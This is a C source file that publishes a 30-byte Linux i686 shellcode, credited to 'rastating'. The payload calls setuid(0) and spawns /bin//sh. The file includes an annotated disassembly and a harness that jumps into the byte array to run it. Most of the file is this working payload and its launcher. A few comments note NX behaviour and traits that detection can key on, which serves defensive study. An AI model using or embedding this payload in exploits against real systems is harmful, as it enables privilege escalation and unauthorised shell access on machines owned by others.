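/*
 * Title  : Linux i686 setuid(0) execve shell (30 bytes)
 * Author : rastating
 *
 * Disassembly of the payload (AT&T syntax):
 *
 * 08048060 <_start>:
 *  8048060: 31 db           xor  %ebx,%ebx        ; ebx = 0 (uid argument)
 *  8048062: 8d 43 17        lea  0x17(%ebx),%eax  ; eax = 0x17 (setuid on i386)
 *  8048065: cd 80           int  $0x80            ; setuid(0), result not checked
 *  8048067: 31 c9           xor  %ecx,%ecx        ; ecx = 0 (argv = NULL)
 *  8048069: 31 d2           xor  %edx,%edx        ; edx = 0 (envp = NULL)
 *  804806b: 52              push %edx             ; string terminator
 *  804806c: 68 2f 2f 73 68  push $0x68732f2f      ; "//sh"
 *  8048071: 68 2f 62 69 6e  push $0x6e69622f      ; "/bin"
 *  8048076: 8d 1c 24        lea  (%esp),%ebx      ; ebx -> "/bin//sh"
 *  8048079: 8d 41 0b        lea  0xb(%ecx),%eax   ; eax = 0xb (execve on i386)
 *  804807c: cd 80           int  $0x80            ; execve("/bin//sh", NULL, NULL)
 *
 * Notes for reviewers and defenders:
 *  - The setuid(0) call only changes anything when the process already
 *    holds the privilege to do so (for example a setuid-root binary);
 *    the payload ignores the return value and spawns the shell anyway.
 *  - The byte string contains no 0x00 byte, which is why strlen() below
 *    reports the full 30-byte length.
 *  - The harness jumps into an array on the stack. On a system enforcing
 *    a non-executable stack (NX / W^X) that call is expected to fault
 *    rather than run the payload.
 *  - The "/bin//sh" immediates followed by int $0x80 in a 32-bit process,
 *    and an execve of a shell from an unexpected parent, are the
 *    observable traits a detection can key on.
 */

#include <stdio.h>
#include <string.h>

/*
 * Test harness: prints the payload length, then transfers control to it.
 * Does not return if the payload's execve succeeds.
 */
int main(void)
{
    unsigned char code[] =
        "\x31\xdb\x8d\x43\x17\xcd\x80\x31"
        "\xc9\x31\xd2\x52\x68\x2f\x2f\x73"
        "\x68\x68\x2f\x62\x69\x6e\x8d\x1c"
        "\x24\x8d\x41\x0b\xcd\x80";

    /*
     * strlen() returns size_t, so the conversion must be %zu (passing it
     * to %d is undefined behaviour), and it takes a const char *, hence
     * the cast from unsigned char.
     */
    printf("Shellcode length: %zu\n", strlen((const char *)code));

    /*
     * ISO C does not define conversion of an object pointer to a function
     * pointer; this is deliberate here and relies on the platform ABI.
     */
    void (*s)(void) = (void (*)(void))code;
    s();

    return 0;
}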